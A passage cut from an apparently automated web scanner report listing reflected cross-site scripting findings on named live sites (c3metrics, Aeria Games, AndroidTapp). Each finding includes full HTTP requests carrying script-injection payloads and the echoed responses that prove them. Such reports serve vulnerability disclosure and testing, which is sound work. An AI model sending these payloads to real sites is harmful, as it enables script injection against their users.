97811300976568';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='14327144791301681488';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='63583<script>alert(1)</script>77c5e15e0f0';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

2.38. http://view.c3metrics.com/c3VTabstrct-6-2.php [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 1d999<script>alert(1)</script>86c5c8291e2 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=721d999<script>alert(1)</script>86c5c8291e2&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-SM=adver_04-01-2011-18-10-29; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-29_16781941211301681429; 480-nUID=adver_16781941211301681429

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:11:25 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_04-01-2011-18-10-29; expires=Sun, 01-May-2011 19:11:25 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadcon_04-01-2011-18-11-08_13920678781301681468ZZZZadver_04-01-2011-18-11-25_11684440531301681485; expires=Wed, 30-Mar-2016 18:11:25 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adcon_13920678781301681468ZZZZadver_11684440531301681485; expires=Fri, 01-Apr-2011 18:26:25 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
his.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='15400897811300976568';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='11684440531301681485';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='721d999<script>alert(1)</script>86c5c8291e2';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

2.39. http://view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload abc86<script>alert(1)</script>be32452b256 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=abc86<script>alert(1)</script>be32452b256&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-SM=adver_04-01-2011-18-10-29; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-29_16781941211301681429; 480-nUID=adver_16781941211301681429

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:11:30 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_04-01-2011-18-10-29; expires=Mon, 04-Apr-2011 18:11:30 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadcon_04-01-2011-18-11-08_13920678781301681468ZZZZadver_04-01-2011-18-11-30_9906481791301681490; expires=Wed, 30-Mar-2016 18:11:30 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adcon_13920678781301681468ZZZZadver_9906481791301681490; expires=Fri, 01-Apr-2011 18:26:30 GMT; path=/; domain=c3metrics.com
Content-Length: 6678
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
S.c3VJSnuid='9906481791301681490';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='abc86<script>alert(1)</script>be32452b256';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

2.40. http://view.c3metrics.com/v.js [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/v.js

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 526ca<script>alert(1)</script>58bb247d50a was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480526ca<script>alert(1)</script>58bb247d50a&t=72 HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_03-28-2011-19-48-35_18309878591301341715

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:10:54 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1039
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480526ca<script>alert(1)</script>58bb247d50a&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://view.c3metrics.com/'+b;var r=new RegExp(a
...[SNIP]...

2.41. http://view.c3metrics.com/v.js [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/v.js

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 4591c<script>alert(1)</script>0799c40acaf was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver4591c<script>alert(1)</script>0799c40acaf&cid=480&t=72 HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_03-28-2011-19-48-35_18309878591301341715

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:10:51 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1039
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver4591c<script>alert(1)</script>0799c40acaf&cid=480&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://view.c3metrics.com/'+b;var r=new
...[SNIP]...

2.42. http://view.c3metrics.com/v.js [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/v.js

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 22ab3<script>alert(1)</script>aba291a8b78 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480&t=7222ab3<script>alert(1)</script>aba291a8b78 HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_03-28-2011-19-48-35_18309878591301341715

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:10:56 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1039
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480&t=7222ab3<script>alert(1)</script>aba291a8b78&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://view.c3metrics.com/'+b;var r=new RegExp(a);var
...[SNIP]...

2.43. http://www.aeriagames.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aeriagames.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f51ac"><script>alert(1)</script>26b262688fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof51ac"><script>alert(1)</script>26b262688fc HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aeriagames.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Set-Cookie: AGESESSID=253b9e3fed2c000be62f6ab117f20c43; path=/; domain=.aeriagames.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 16:12:06 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
P3P: CP=\"CAO IDC DSP COR CURa ADMa PSA OUR IND PHY ONL COM STA\"
Content-Type: text/html; charset=utf-8
Date: Fri, 01 Apr 2011 16:12:06 GMT
Server: Aeria Games & Entertainment
Content-Length: 30952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<met
...[SNIP]...
<a lang="en" href="javascript:void(0);" class="mnu3-a" rel="http://www.aeriagames.com/favicon.icof51ac"><script>alert(1)</script>26b262688fc">
...[SNIP]...

2.44. http://www.aeriagames.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aeriagames.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b7d3"><script>alert(1)</script>83550672c45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?3b7d3"><script>alert(1)</script>83550672c45=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aeriagames.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Set-Cookie: AGESESSID=5d5f9a7f9719a26b405144a9e452eec3; path=/; domain=.aeriagames.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 16:12:02 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
P3P: CP=\"CAO IDC DSP COR CURa ADMa PSA OUR IND PHY ONL COM STA\"
Content-Type: text/html; charset=utf-8
Date: Fri, 01 Apr 2011 16:12:02 GMT
Server: Aeria Games & Entertainment
Content-Length: 30979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<met
...[SNIP]...
<a lang="en" href="javascript:void(0);" class="mnu3-a" rel="http://www.aeriagames.com/favicon.ico?3b7d3"><script>alert(1)</script>83550672c45=1">
...[SNIP]...

2.45. http://www.aeriagames.com/meebo.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aeriagames.com
Path:	/meebo.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1ddf"><script>alert(1)</script>a6cec7a49b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /meebo.htmld1ddf"><script>alert(1)</script>a6cec7a49b4?network=aeriagames&lang=en HTTP/1.1
Host: www.aeriagames.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/favicon.icof51ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E26b262688fc
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AGESESSID=253b9e3fed2c000be62f6ab117f20c43; utm_ref=http://burp/show/40

Response

HTTP/1.1 200 OK
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
P3P: CP=\"CAO IDC DSP COR CURa ADMa PSA OUR IND PHY ONL COM STA\"
Content-Type: text/html; charset=utf-8
Date: Fri, 01 Apr 2011 18:17:19 GMT
Server: Aeria Games & Entertainment
Content-Length: 31114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<met
...[SNIP]...
<a lang="en" href="javascript:void(0);" class="mnu3-a" rel="http://www.aeriagames.com/meebo.htmld1ddf"><script>alert(1)</script>a6cec7a49b4?network=aeriagames">
...[SNIP]...

2.46. http://www.aeriagames.com/themes/main/favicon.ico [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aeriagames.com
Path:	/themes/main/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86f0a"><script>alert(1)</script>7e23ca68d85 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/main/favicon.ico86f0a"><script>alert(1)</script>7e23ca68d85 HTTP/1.1
Host: www.aeriagames.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AGESESSID=253b9e3fed2c000be62f6ab117f20c43; utm_ref=http://burp/show/40; __utmz=71836108.1301681874.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=71836108.1321417754.1301681874.1301681874.1301681874.1; __utmc=71836108; __utmb=71836108.1.10.1301681874; meebo-cim=channel%3D82; meebo-cim-session=ad-start-time%3D1301681875296%26start-time%3D1301681875312; __gads=ID=c2b00adb1bb4738d:T=1301681837:S=ALNI_MZdu27SS-zjLAzwIlLA-SFdjLpSBQ

Response

HTTP/1.1 200 OK
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:48 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
P3P: CP=\"CAO IDC DSP COR CURa ADMa PSA OUR IND PHY ONL COM STA\"
Content-Type: text/html; charset=utf-8
Date: Fri, 01 Apr 2011 18:17:48 GMT
Server: Aeria Games & Entertainment
Content-Length: 31060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<met
...[SNIP]...
<a lang="en" href="javascript:void(0);" class="mnu3-a" rel="http://www.aeriagames.com/themes/main/favicon.ico86f0a"><script>alert(1)</script>7e23ca68d85">
...[SNIP]...

2.47. http://www.aeriagames.com/themes/main/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aeriagames.com
Path:	/themes/main/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e0ac"><script>alert(1)</script>f4bce6bc013 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/main/favicon.ico?2e0ac"><script>alert(1)</script>f4bce6bc013=1 HTTP/1.1
Host: www.aeriagames.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AGESESSID=253b9e3fed2c000be62f6ab117f20c43; utm_ref=http://burp/show/40; __utmz=71836108.1301681874.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=71836108.1321417754.1301681874.1301681874.1301681874.1; __utmc=71836108; __utmb=71836108.1.10.1301681874; meebo-cim=channel%3D82; meebo-cim-session=ad-start-time%3D1301681875296%26start-time%3D1301681875312; __gads=ID=c2b00adb1bb4738d:T=1301681837:S=ALNI_MZdu27SS-zjLAzwIlLA-SFdjLpSBQ

Response

HTTP/1.1 200 OK
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:47 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
P3P: CP=\"CAO IDC DSP COR CURa ADMa PSA OUR IND PHY ONL COM STA\"
Content-Type: text/html; charset=utf-8
Date: Fri, 01 Apr 2011 18:17:47 GMT
Server: Aeria Games & Entertainment
Content-Length: 31087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<met
...[SNIP]...
<a lang="en" href="javascript:void(0);" class="mnu3-a" rel="http://www.aeriagames.com/themes/main/favicon.ico?2e0ac"><script>alert(1)</script>f4bce6bc013=1">
...[SNIP]...

2.48. http://www.androidtapp.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ef3b2<script>alert(1)</script>d2de5acaa49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoef3b2<script>alert(1)</script>d2de5acaa49 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.androidtapp.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 15:39:01 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Set-Cookie: PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; path=/
Last-Modified: Fri, 01 Apr 2011 15:39:01 GMT
Vary: Cookie
Expires: Fri, 01 Apr 2011 16:39:01 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: e3aa57f2bc9542101a5bf25621531e29
Vary: User-Agent
Content-Length: 55020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/favicon.icoef3b2<script>alert(1)</script>d2de5acaa49 </strong>
...[SNIP]...

2.49. http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b6931<script>alert(1)</script>dcde4a5a5cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3Cb6931<script>alert(1)</script>dcde4a5a5cc/script%3Ed2de5acaa49 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 18:15:50 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Last-Modified: Fri, 01 Apr 2011 18:15:50 GMT
Vary: Accept-Encoding, Cookie
Expires: Fri, 01 Apr 2011 19:15:50 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: 699ce975eff4981aa59165f787b7046c
Vary: User-Agent
Content-Length: 55461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3Cb6931<script>alert(1)</script>dcde4a5a5cc/script%3Ed2de5acaa49 </strong>
...[SNIP]...

2.50. http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d550f<script>alert(1)</script>b00bae0de29 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49d550f<script>alert(1)</script>b00bae0de29 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 18:16:05 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
